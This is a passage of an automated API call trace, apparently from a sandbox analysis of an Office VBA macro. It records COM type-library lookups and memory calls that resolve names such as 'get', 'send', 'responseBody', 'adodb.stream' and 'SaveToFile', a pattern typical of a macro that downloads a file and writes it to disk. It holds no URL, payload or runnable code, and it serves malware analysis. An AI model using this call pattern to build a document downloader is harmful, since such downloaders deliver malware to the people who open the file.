lpMultiByteStr=0x1d3a3172fd6, cbMultiByte=11, lpWideCharStr=0x33e4fb4800, cchWideChar=12 | out: lpWideCharStr="_B_var_yyy") returned 11 [0060.569] ITypeComp:RemoteBind (in: This=0x1d3980663c0, szName="_B_var_yyy", lHashVal=0x509d82, wFlags=0x5, ppTInfo=0x33e4fb47b8, pDescKind=0x33e4fb47cc, ppFuncDesc=0x33e4fb47d0, ppVarDesc=0x79005f00720061, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb47b8*=0x0, pDescKind=0x33e4fb47cc*=0, ppFuncDesc=0x33e4fb47d0, ppVarDesc=0x79005f00720061, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.569] _mbscpy_s (in: _Dst=0x33e4fb49c0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e82 | out: _Dst=0x33e4fb49c0) returned 0x0 [0060.569] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3970) [0060.569] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3dc0000 [0060.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d39d8fa4c4, cbMultiByte=3, lpWideCharStr=0x1d3a3dc1ae4, cchWideChar=8 | out: lpWideCharStr="get") returned 3 [0060.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3171556, cbMultiByte=6, lpWideCharStr=0x33e4fb4660, cchWideChar=5 | out: lpWideCharStr="Open") returned 0 [0060.570] wcscpy_s (in: _Destination=0x1d39dbc5e78, _SizeInWords=0x5, _Source="Open" | out: _Destination="Open") returned 0x0 [0060.570] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d98d2c0, cb=0x400) returned 0x1d3984b9eb0 [0060.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172ea6, cbMultiByte=6, lpWideCharStr=0x33e4fb4660, cchWideChar=5 | out: lpWideCharStr="send") returned 0 [0060.570] wcscpy_s (in: _Destination=0x1d39dbc5e90, _SizeInWords=0x5, _Source="send" | out: _Destination="send") returned 0x0 [0060.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172ece, cbMultiByte=14, lpWideCharStr=0x33e4fb4660, cchWideChar=13 | out: lpWideCharStr="responseBody") returned 0 [0060.570] wcscpy_s (in: _Destination=0x1d39dbc5ea8, _SizeInWords=0xd, _Source="responseBody" | out: _Destination="responseBody") returned 0x0 [0060.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172efe, cbMultiByte=8, lpWideCharStr=0x33e4fb4660, cchWideChar=7 | out: lpWideCharStr="Status") returned 0 [0060.571] wcscpy_s (in: _Destination=0x1d39dbc5ed0, _SizeInWords=0x7, _Source="Status" | out: _Destination="Status") returned 0x0 [0060.571] realloc (_Block=0x0, _Size=0xc0) returned 0x1d39bdee880 [0060.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d39d8fa516, cbMultiByte=12, lpWideCharStr=0x1d3a3dc2ea8, cchWideChar=26 | out: lpWideCharStr="adodb.stream") returned 12 [0060.571] IUnknown:AddRef (This=0x1d39d9d5068) returned 0x3 [0060.571] IUnknown:Release (This=0x1d39d9d5068) returned 0x2 [0060.571] IUnknown:QueryInterface (in: This=0x1d39d9d5068, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.571] IUnknown:QueryInterface (in: This=0x1d39d9d5068, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3986370ec, cbMultiByte=0, lpWideCharStr=0x1d3a3dc3056, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0060.571] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d5068, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.571] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.571] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.571] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.571] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.571] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.571] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3171556, cbMultiByte=6, lpWideCharStr=0x33e4fb4660, cchWideChar=5 | out: lpWideCharStr="Open") returned 0 [0060.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3171bfe, cbMultiByte=6, lpWideCharStr=0x33e4fb4660, cchWideChar=5 | out: lpWideCharStr="Type") returned 0 [0060.571] wcscpy_s (in: _Destination=0x1d39dbc5f10, _SizeInWords=0x5, _Source="Type" | out: _Destination="Type") returned 0x0 [0060.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3171e0a, cbMultiByte=7, lpWideCharStr=0x33e4fb4660, cchWideChar=6 | out: lpWideCharStr="Write") returned 0 [0060.571] wcscpy_s (in: _Destination=0x1d39dbc5f28, _SizeInWords=0x6, _Source="Write" | out: _Destination="Write") returned 0x0 [0060.571] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3dd0000 [0060.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172f26, cbMultiByte=12, lpWideCharStr=0x33e4fb4660, cchWideChar=11 | out: lpWideCharStr="SaveToFile") returned 0 [0060.572] wcscpy_s (in: _Destination=0x1d39dbc5f40, _SizeInWords=0xb, _Source="SaveToFile" | out: _Destination="SaveToFile") returned 0x0 [0060.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3170506, cbMultiByte=7, lpWideCharStr=0x33e4fb4660, cchWideChar=6 | out: lpWideCharStr="Close") returned 0 [0060.572] wcscpy_s (in: _Destination=0x1d39dbc5f60, _SizeInWords=0x6, _Source="Close" | out: _Destination="Close") returned 0x0 [0060.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3171556, cbMultiByte=6, lpWideCharStr=0x33e4fb4660, cchWideChar=5 | out: lpWideCharStr="Open") returned 0 [0060.572] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d5068, ppTLib=0x33e4fb4510, pIndex=0x0 | out: ppTLib=0x33e4fb4510*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.573] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb4520, pDummy=0x0 | out: ppTLibAttr=0x33e4fb4520, pDummy=0x0) returned 0x0 [0060.573] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.573] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.573] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0xe4fb4510, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.573] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb4510, pBstrName=0x0, pwOrdinal=0x33e4fb4530 | out: pBstrDllName=0x33e4fb4510*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb4530*=0x47a0) returned 0x0 [0060.573] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb4510, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb4510, pwOrdinal=0x500000000) returned 0x0 [0060.573] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552800, ppTypeAttr=0x33e4fb4048, pDummy=0x33e4fb4104 | out: ppTypeAttr=0x33e4fb4048, pDummy=0x33e4fb4104*=0x1d3) returned 0x0 [0060.574] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552800) returned 0x0 [0060.574] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x412) returned 0x1d39dbc34d0 [0060.574] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x26d) returned 0x1d39808b080 [0060.574] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.574] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.574] GetCurrentProcess () returned 0xffffffffffffffff [0060.574] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39808b080, dwSize=0x4c) returned 1 [0060.574] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39808b080) [0060.574] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d5528b0, ppTypeAttr=0x33e4fb4050, pDummy=0x0 | out: ppTypeAttr=0x33e4fb4050, pDummy=0x0) returned 0x0 [0060.574] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d5528b0) returned 0x0 [0060.574] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x26d) returned 0x1d39808b080 [0060.574] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.574] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.574] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.574] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.574] GetCurrentProcess () returned 0xffffffffffffffff [0060.574] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39808b080, dwSize=0x5c) returned 1 [0060.574] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39808b080) [0060.574] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552b18, ppTypeAttr=0x33e4fb4290, pDummy=0x0 | out: ppTypeAttr=0x33e4fb4290, pDummy=0x0) returned 0x0 [0060.574] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552b18) returned 0x0 [0060.574] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x26d) returned 0x1d39808b080 [0060.574] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.574] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.574] GetCurrentProcess () returned 0xffffffffffffffff [0060.574] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39808b080, dwSize=0x4c) returned 1 [0060.574] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39808b080) [0060.574] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d55b180, ppTypeAttr=0x33e4fb44d0, pDummy=0x0 | out: ppTypeAttr=0x33e4fb44d0, pDummy=0x0) returned 0x0 [0060.574] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d55b180) returned 0x0 [0060.574] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x26d) returned 0x1d39808b580 [0060.574] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b580) returned 0x26d [0060.574] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b580) returned 0x26d [0060.574] GetCurrentProcess () returned 0xffffffffffffffff [0060.574] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39808b580, dwSize=0x4c) returned 1 [0060.574] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39808b580) [0060.574] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d55b288, ppTypeAttr=0x33e4fb4710, pDummy=0x0 | out: ppTypeAttr=0x33e4fb4710, pDummy=0x0) returned 0x0 [0060.574] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d55b288) returned 0x0 [0060.574] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d5068, ppTLib=0x33e4fb46a0, pIndex=0x0 | out: ppTLib=0x33e4fb46a0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.575] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb46b0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb46b0, pDummy=0x0) returned 0x0 [0060.575] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.575] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.575] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0xe4fb46a0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.575] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb46a0, pBstrName=0x0, pwOrdinal=0x33e4fb46c0 | out: pBstrDllName=0x33e4fb46a0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb46c0*=0x4930) returned 0x0 [0060.575] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb46a0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb46a0, pwOrdinal=0x500000000) returned 0x0 [0060.575] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb37e0, pIndex=0x0 | out: ppTLib=0x33e4fb37e0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.575] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb37f0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb37f0, pDummy=0x0) returned 0x0 [0060.575] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.575] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.575] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb37e0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.575] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb37e0, pBstrName=0x0, pwOrdinal=0x33e4fb3800 | out: pBstrDllName=0x33e4fb37e0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3800*=0x3a70) returned 0x0 [0060.575] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb37e0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb37e0, pwOrdinal=0x500000000) returned 0x0 [0060.575] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb37e0, pIndex=0x0 | out: ppTLib=0x33e4fb37e0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.575] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb37f0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb37f0, pDummy=0x0) returned 0x0 [0060.575] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.575] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.575] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb37e0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.575] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb37e0, pBstrName=0x0, pwOrdinal=0x33e4fb3800 | out: pBstrDllName=0x33e4fb37e0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3800*=0x3a70) returned 0x0 [0060.575] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb37e0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb37e0, pwOrdinal=0x500000000) returned 0x0 [0060.575] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb38e0, pIndex=0x0 | out: ppTLib=0x33e4fb38e0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.576] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb38f0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb38f0, pDummy=0x0) returned 0x0 [0060.576] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.576] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.576] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb38e0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.576] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb38e0, pBstrName=0x0, pwOrdinal=0x33e4fb3900 | out: pBstrDllName=0x33e4fb38e0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3900*=0x3b70) returned 0x0 [0060.576] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb38e0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb38e0, pwOrdinal=0x500000000) returned 0x0 [0060.576] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb39c0, pIndex=0x0 | out: ppTLib=0x33e4fb39c0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.576] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb39d0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb39d0, pDummy=0x0) returned 0x0 [0060.576] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.576] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.576] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb39c0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.576] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb39c0, pBstrName=0x0, pwOrdinal=0x33e4fb39e0 | out: pBstrDllName=0x33e4fb39c0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb39e0*=0x3c50) returned 0x0 [0060.576] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb39c0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb39c0, pwOrdinal=0x500000000) returned 0x0 [0060.576] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3aa0, pIndex=0x0 | out: ppTLib=0x33e4fb3aa0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.576] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3ab0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3ab0, pDummy=0x0) returned 0x0 [0060.576] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.576] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.577] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3aa0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.577] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3aa0, pBstrName=0x0, pwOrdinal=0x33e4fb3ac0 | out: pBstrDllName=0x33e4fb3aa0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3ac0*=0x3d30) returned 0x0 [0060.577] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3aa0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3aa0, pwOrdinal=0x500000000) returned 0x0 [0060.577] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3b80, pIndex=0x0 | out: ppTLib=0x33e4fb3b80*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.577] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3b90, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3b90, pDummy=0x0) returned 0x0 [0060.577] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.577] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.577] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3b80, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.577] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3b80, pBstrName=0x0, pwOrdinal=0x33e4fb3ba0 | out: pBstrDllName=0x33e4fb3b80*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3ba0*=0x3e10) returned 0x0 [0060.577] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3b80, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3b80, pwOrdinal=0x500000000) returned 0x0 [0060.577] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3c60, pIndex=0x0 | out: ppTLib=0x33e4fb3c60*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.577] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3c70, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3c70, pDummy=0x0) returned 0x0 [0060.577] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.577] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.577] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3c60, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", 